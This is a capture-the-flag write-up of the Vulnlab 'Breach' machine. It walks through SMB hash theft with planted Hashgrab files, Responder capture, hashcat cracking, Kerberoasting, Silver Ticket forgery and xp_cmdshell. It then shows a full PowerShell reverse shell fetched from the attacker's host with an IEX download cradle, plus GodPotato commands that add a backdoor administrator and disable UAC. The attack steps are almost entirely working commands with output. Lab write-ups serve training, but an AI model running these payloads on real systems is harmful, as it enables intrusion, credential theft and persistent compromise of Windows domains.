Vulnlab - Breach
Introduction
This post describes a complete attack chain executed in a practice lab environment. The process began with enumerating exposed services, followed by exploiting writable SMB shares to capture NTLMv2 hashes. The credentials obtained were used to perform Kerberoasting, and the cracked service account credentials facilitated a Silver Ticket attack to gain administrative control. Each step is detailed below, highlighting the vulnerabilities and exploitation techniques.
Nmap
An initial scan of the target revealed several open ports and services. These are the key findings:
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-05-28T06:51:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-28T06:30:37
| Not valid after: 2053-05-28T06:30:37
| MD5: 3f3c510f52fbda721e04a6cc753b2ee4
| SHA-1: 5a4d69337171f01588e19913fd165aaad5302f7d
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQIwm2KBeCAK9MrMdIi8NKIDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjMwNTI4MDYzMDM3WhgPMjA1MzA1MjgwNjMwMzdaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALx2GuzP
| 7dSlNKWV/PFHj+0oRq4+tue8UJUI0jTQv3xle//h3QEH01SE0SbVXUV0URpKpnzc
| 3GOSAbAX807jbFsEwofPSPYCzcXVDOedb9wJ3PdMZmqJKvIcKDUV+I6ijUq4lxJl
| 6lnLLpj+trdbI54J1KSyoJzuIJJXdSxDaf319Rk4LNTHgDHXmSeiUn+3nZP2m2SH
| de2ONf9S0J6HO+rxCVQdinxVIoH4eqROT6ZUzWhARA4APK7GvJ5sNpHe2ZRJ3iDB
| QFaRWuljmc6l0PMO/no/q5Mq9ttWSx8iJX+vc/qqhcogHw5fmnPGJGE/vr22f4Qm
| 2YOSdtQvi0q75+kCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAAVuNujsXCrk8egdC
| jm9/ipiNphTfTrAcAeV1doATzcs1JiQzDj1Nt8Gyjkm88v22O/7114kNOeedDISG
| nR9f2l4e54teNft8Iz39Zlcqv/uekyyB+18yhH2Vlh4NcBe+bIAp09ER4xuCvSzi
| C0g5n9uz/xeiqVqrEq8rC/yJneM8hPBLOUNDNSGKBhsSrHFqPtSdhSO1Ps5DjB5u
| ESsbwry170HOJjgHLLlq9OfQt1T1IUq68hb+3RuJW+JDLc6RAOPxRxUAFZiFJQKa
| gewQOAGCeV69AMRIhQDzCu01ssVQz9ebu8rl+9aGrcUQDUmaKxrNzjR5aPpePwri
| 73KBFQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.10.104.77:1433:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
|_ Product_Version: 10.0.20348
| ms-sql-info:
| 10.10.104.77:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-27T06:29:05
| Not valid after: 2023-11-26T06:29:05
| MD5: 1e92160c4f82fc5ab03f9acff4440a2b
| SHA-1: 67edf25a48df793d8481abefc608ff160a7104b6
| -----BEGIN CERTIFICATE-----
| MIIC6DCCAdCgAwIBAgIQOhdBcC0236BKIEFEwzryejANBgkqhkiG9w0BAQsFADAd
| MRswGQYDVQQDExJCUkVBQ0hEQy5icmVhY2gudmwwHhcNMjMwNTI3MDYyOTA1WhcN
| MjMxMTI2MDYyOTA1WjAdMRswGQYDVQQDExJCUkVBQ0hEQy5icmVhY2gudmwwggEi
| MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBEKaqidj4w/msEh/XlMtTA+uW
| NX8FQq3wl+6LHr1hnxD8FO5sm/bbmbgFUUeeoZFwrQXC1bZSVHLM0G1i/EMg+Tt/
| 9ipcgPVveEJ4q5MP+cTW7b2YzKxeXikljTvWzlDLKdyIKDIRnEYQvrTdp62k51PK
| myIO8eHwPP6tDeUsWDn6dL2K0d56jcYY1AcjnJwC7yxAw5xMvH+9n1Jmi9KNImQJ
| lyonFFmWrgKx93daMENWoPGnYiMlltpu8TKS8FHf6bJU65hv3YZSPJClOSUs2aqN
| rnAzPFnkKIjj8KYAZsY9HGitk0tU/rPl4qn7w6jbEr7sP2fipVJeMpuDieaVAgMB
| AAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG
| 9w0BAQsFAAOCAQEAm2heqHQsgp0PBlLN2e5siPEPdrH85AC7xCf/RcicT5grdyvp
| IZs0sEN/GvIVUFg+2A6xvTplsbvgRCofQiAJrDL/lvw1qkNN2E6lsdmKlr71UkGG
| DmwpswvttABbX3gnSOm+naBhooCsGWHO9jOzODKDyygH/SHECDA5scIA5Azm4FDD
| ELlnN6YcecDrMYV/vU4SkNIy0SVF0htJLHYNTjxBbLDM2+KGtVvIiX2VUd4Fedsj
| UbVv7WRCYxks+1WHqyA2G2Zi0YEc8f9BHOZ/VAKYr5h+NGiPmYNjd3GMTuHvDZx4
| Bj23/mUInVK5YrSSQa4lM8Rxlaftq5JaeToaAA==
|_-----END CERTIFICATE-----
|_ssl-date: 2023-05-28T06:51:23+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-05-28T06:50:43+00:00
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53054/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58013/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCNotably, SMB (445/tcp) allowed guest access, and the MS-SQL service provided valuable information about the domain (breach.vl).
Enumeration
Using netexec, SMB shares were enumerated, revealing a writable share named share:
└─$ netexec smb 10.10.118.159 -u 'guest' -p '' --shares
SMB 10.10.118.159 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.118.159 445 BREACHDC [+] breach.vl\guest:
SMB 10.10.118.159 445 BREACHDC [*] Enumerated shares
SMB 10.10.118.159 445 BREACHDC Share Permissions Remark
SMB 10.10.118.159 445 BREACHDC ----- ----------- ------
SMB 10.10.118.159 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.118.159 445 BREACHDC C$ Default share
SMB 10.10.118.159 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.118.159 445 BREACHDC NETLOGON Logon server share
SMB 10.10.118.159 445 BREACHDC share READ,WRITE
SMB 10.10.118.159 445 BREACHDC SYSVOL Logon server share
SMB 10.10.118.159 445 BREACHDC Users READThe writable access indicated potential opportunities for hash theft or payload execution.
Exploitation
Stealing NTLMv2 Hashes
The writable share was leveraged to steal NTLMv2 hashes using crafted files generated by Hashgrab:
└─$ sudo hashgrab 10.8.4.110 security
[*] Generating hash grabbing files..
[*] Written @security.scf
[*] Written @security.url
[*] Written security.library-ms
[*] Written desktop.ini
[*] Written lnk_584.ico
[+] Done, upload files to smb share and capture hashes with smbserver.py/responderThe generated files were uploaded to share/transfer/:
└─$ smbclientng --host 10.10.118.159 -u 'guest' -p ''
...
■[\\10.10.118.159\share\transfer\]> put security.lnk
security.lnk
'security.lnk' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 986/986 bytes • ? • 0:00:00Responder was run to capture the NTLMv2 hash of Julia.Wong:
└─$ sudo responder -I tun0
...
[SMB] NTLMv2-SSP Client : 10.10.118.159
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:138a7d95e21ecdf7:AE68D9F8DB7677A2D49FF395BF87ADD1:01010...0000Using hashcat, the password Computer1 was cracked:
└─$ hashcat -m 5600 -a 0 julia.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...User Flag
With valid credentials (Julia.Wong:Computer1), access was granted by SMB to the share directory where the user flag was found.
└─$ smbclientng --host 10.10.118.159 -u 'Julia.Wong' -p 'Computer1'
...
■[\\10.10.118.159\share\transfer\julia.wong\]> cat local.txt
VL{CENSORED}Kerberoasting for Service Account Credentials
The user account was used to request Kerberos service tickets (TGS) for a service account (svc_mssql):
└─$ sudo impacket-GetUserSPNs -dc-ip 10.10.96.166 -request -outputfile hashes.kerberoast breach.vl/'Julia.Wong':'Computer1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 11:43:08.106169 2024-12-18 08:13:37.014622The hash was cracked using hashcat, revealing the password Trustno1.
└─$ hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$f007d990...216d:Trustno1
...Privilege Escalation
Silver Ticket Attack
Gathering Required Information
To execute a Silver Ticket attack, the following data was collected:
- Domain SID: Obtained using
ldapsearch:
└─$ sudo ldapsearch -x -H ldap://10.10.92.130 -D "svc_mssql" -w "Trustno1" -b "DC=breach,DC=vl" "(objectClass=domain)" | grep objectSid | awk '{print $2}'| python3 -c " import base64, struct, sys sid_base64 = sys.stdin.read().strip() # Leer entrada estándar binary_sid = base64.b64decode(sid_base64) version = binary_sid[0] identifier_authority = int.from_bytes(binary_sid[2:8], byteorder='big') sub_authorities = struct.unpack('<' + 'I' * binary_sid[1], binary_sid[8:]) sid = f'S-{version}-{identifier_authority}' + ''.join(f'-{sub_auth}' for sub_auth in sub_authorities) print(sid)"
S-1-5-21-2330692793-3312915120-706255856- Service Principal Name (SPN): Identified earlier with
impacket-GetUserSPNsasMSSQLSvc/breachdc.breach.vl:1433. - NTLM Hash: Derived from the cracked
svc_mssqlpassword using Python:
└─$ python3 -c 'import hashlib; print(hashlib.new("md4", "Trustno1".encode("utf-16le")).hexdigest())'
69596c7aa1e8daee17f8e78870e25a5cCreating the Silver Ticket
Using impacket-ticketer, a Silver Ticket was generated for the Administrator account:
└─$ sudo impacket-ticketer -user svc_mssql -nthash 69596c7aa1e8daee17f8e78870e25a5c -dc-ip 10.10.92.130 -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn 'MSSQLSvc/breachdc.breach.vl:1433' Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheUsing the Silver Ticket
The ticket was loaded into the current session using klist:
└─$ export KRB5CCNAME=Administrator.ccache
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREACH.VL
Valid starting Expires Service principal
12/18/2024 11:02:32 12/16/2034 11:02:32 MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
renew until 12/16/2034 11:02:32Additionally, the hostname breachdc.breach.vl was added to /etc/hosts.
└─$ sudo echo "10.10.92.130 breachdc.breach.vl" >> /etc/hostsGaining SQL Server Access
With the ticket loaded, the MSSQL service was accessed as the Administrator:
└─$ sudo impacket-mssqlclient breachdc.breach.vl -k -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>SQL commands enabled command execution through xp_cmdshell:
SQL (BREACH\Administrator dbo@master)> EXEC sp_configure 'show advanced option',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'whoami';
output
----------------
breach\svc_mssql
NULL
SQL (BREACH\Administrator dbo@master)>Final Administrative Shell
A reverse shell was established by hosting a PowerShell script on a local PHP server to bypass the antivirus and executing it via xp_cmdshell:
└─$ cat shell.txt
$TCPClient = New-Object Net.Sockets.TCPClient('10.8.4.110', 8787);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
└─$ php -S 0.0.0.0:80 -t .SQL command to execute the shell:
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.4.110/shell.txt") | powershell -ep bypass -noprofile'A connection was received on the listener:
└─$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.8.4.110] from (UNKNOWN) [10.10.92.130] 53960
SHELL> whoami
breach\svc_mssql
SHELL>Elevating to System
The svc_mssql account had SeImpersonatePrivilege, enabling token impersonation:
SHELL> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SHELL>Using GodPotato-NET4.exe, a new administrative user was created:
SHELL> iwr -uri http://10.8.4.110/GodPotato-NET4.exe -o GodPotato-NET4.exe
SHELL> .\GodPotato-NET4.exe -cmd "net user x4v1l0k password123! /add"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "net localgroup administrators x4v1l0k /add"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
...
The command completed successfully.With the user created and the WinRM server active, the connection is made through Evil-WinRM:
└─$ evil-winrm -i 10.10.92.130 -u x4v1l0k -p 'password123!'
*Evil-WinRM* PS C:\Users\x4v1l0k\Documents> cat C:\Users\Administrator\Desktop\root.txt
VL{CENSORED}